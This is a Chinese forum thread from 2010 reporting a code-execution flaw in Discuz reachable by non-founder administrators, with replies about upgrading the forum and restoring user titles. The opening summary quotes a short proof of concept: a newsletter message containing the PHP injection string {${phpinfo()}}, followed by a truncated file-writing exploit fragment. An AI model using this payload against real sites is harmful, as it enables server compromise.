Project1»广场 › 外层空间 › 版务专区 › Discuz非创始人管理员代码执行漏洞

Discuz非创始人管理员代码执行漏洞

查看数: 3064 | 评论数: 4 | 收藏 0

关灯 | 提示：支持键盘翻页<-左右->

帖子模式

我爱食叉包

发布时间: 2010-10-24 20:39

正文摘要:

本帖最后由我爱食叉包于 2010-10-24 20:40 编辑 global.func.php POC： 1. admincp.php?frames=yes&action=members&operation=newsletter 2. 发短消息，通知内容为：{${phpinfo()}} EXP - (fputs(fopen('fo ...

IamI 发表于 2010-10-26 06:03:48

噗...面对此情此景，我表示沉默。

明火暗雷 发表于 2010-10-25 00:33:42

DX1.5的“内核”很有爱。至于外观就更有爱了。。搞投票吧，外观我反正很萌之

傳說の仙劍 发表于 2010-10-24 21:54:52

不是那么簡單
升級后又得重新弄回稱號系統

点评

逍遥仙君

其实我们很谅解的。一个一个恢复称号不容易。不过就这么拖着也不是办法啊。等将来肯定要升级。估计那时候称号更多，当断不断必受其乱啊！发表于 2010-10-24 21:58

fux2 发表于 2010-10-24 21:52:55

我们站的管理员素质都非常好的！有这个漏洞他们会去钻么？

如果居心不良能当管理么……

帐号		自动登录	找回密码
密码			注册会员

Discuz非创始人管理员代码执行漏洞

正文摘要:

回复

点评